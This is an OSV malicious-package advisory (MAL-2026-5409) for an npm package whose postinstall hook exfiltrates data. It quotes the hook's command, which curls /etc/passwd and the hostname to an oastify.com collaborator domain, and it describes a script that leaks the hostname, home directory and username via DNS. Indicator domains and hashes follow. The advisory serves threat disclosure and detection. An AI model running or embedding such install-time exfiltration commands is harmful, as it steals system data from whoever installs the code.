MAL-2026-5409

Import Source

https://github.com/ossf/malicious-packages/blob/main/osv/malicious/npm/@easy-entry/outside-registration-fop-navigator/MAL-2026-5409.json

JSON Data

https://api.osv.dev/v1/vulns/MAL-2026-5409

Published

2026-06-09T17:18:57Z

Modified

2026-06-09T18:01:29.959795370Z

Summary

Malicious code in @easy-entry/outside-registration-fop-navigator (npm)

Details

-= Per source details. Do not edit below this line.=-

Source: amazon-inspector (04091b4e3c6018586c8ba0c6106ff9177090d0776d1a723d041a76d67b1c8f2b)

On npm install, package.json's postinstall hook executes node scripts/scream3gg.js && /usr/bin/curl --data '@/etc/passwd' $(hostname).200hj786m7x4kfz1lkr4kmshu80zoqcf.oastify.com, sending the installer's /etc/passwd contents and hostname to a Burp Collaborator subdomain. In parallel, scripts/scream3gg.js hex-encodes os.hostname(), os.homedir(), and os.userInfo().username and issues a fetch to http://<hex>.nmd25sur8sjp60lm75dp67e2gtmkaayz.oastify.com, leaking installer host identity through DNS/HTTP to the attacker. Both behaviors fire automatically and unconditionally on default install.

Database specific

{
    "malicious-packages-origins": [
        {
            "modified_time": "2026-06-09T17:18:57Z",
            "versions": [
                "99.9.5"
            ],
            "sha256": "04091b4e3c6018586c8ba0c6106ff9177090d0776d1a723d041a76d67b1c8f2b",
            "id": "IN-MAL-2026-005025",
            "source": "amazon-inspector",
            "import_time": "2026-06-09T17:45:49.740932319Z"
        },
        {
            "import_time": "2026-06-09T17:45:49.829197796Z",
            "versions": [
                "99.9.5"
            ],
            "sha256": "8f3fde652e3e14c71950b1c929e0be830c9e81c44378a2e625e6e9bfea8ab8f6",
            "id": "IN-MAL-2026-005026",
            "source": "amazon-inspector",
            "modified_time": "2026-06-09T17:18:57Z"
        }
    ]
}

References

https://www.npmjs.com/package/@easy-entry/outside-registration-fop-navigator/v/99.9.5

Credits

- Amazon Inspector - FINDER
- - inspector-research@amazon.com

Affected packages

npm / @easy-entry/outside-registration-fop-navigator

Package

Name: @easy-entry/outside-registration-fop-navigator; View open source insights on deps.dev
Purl: pkg:npm/%40easy-entry%2Foutside-registration-fop-navigator

Affected ranges

Affected versions

99.*

99.9.5

Database specific

indicators

{
    "domains": [
        "2f686f6d652f7363616e.nmd25sur8sjp60lm75dp67e2gtmkaayz.oastify.com",
        "7363616e2d636662643231313766346366.nmd25sur8sjp60lm75dp67e2gtmkaayz.oastify.com",
        "7363616e.nmd25sur8sjp60lm75dp67e2gtmkaayz.oastify.com"
    ],
    "evidence_files": [
        {
            "sha256": "7cfe7d61a3f378ab0a79ef3db901372b6167ab6621a6d9a8ee5c818b9a32915a",
            "tlsh": "9ed097a0bc20cb73b9de1677c428a2497d63cc9b17007e2202db87f09114371b9a6c0a",
            "path": "package.json"
        },
        {
            "sha256": "9b962b07165e35cb12a1424434b1d1be779ead9b43df94af8baf0e5a1b66a6c9",
            "tlsh": "74f08ba955b11938382b50819dafd40db1e7fa0630a6e4f2fedd86810f44865bd22dde",
            "path": "scripts/scream3gg.js"
        }
    ],
    "package_integrity": [
        {
            "hashes": {
                "sha512_sri": "sha512-vpCRGv5vvBsXb9RyJ6yP1yQkpuKKUjrVsWApSlfKIxcItE5vWytgrn4Vdpxv1LeqnDS1F+GAUO2wuCAcylAzDw==",
                "sha1": "03c230ca2b513d68fbb5627f10784458abb99967"
            },
            "filename": "outside-registration-fop-navigator-99.9.5.tgz"
        }
    ]
}

cwes

[
    {
        "description": "The product contains code that appears to be malicious in nature.",
        "name": "Embedded Malicious Code",
        "cweId": "CWE-506"
    }
]

source

"https://github.com/ossf/malicious-packages/blob/main/osv/malicious/npm/@easy-entry/outside-registration-fop-navigator/MAL-2026-5409.json"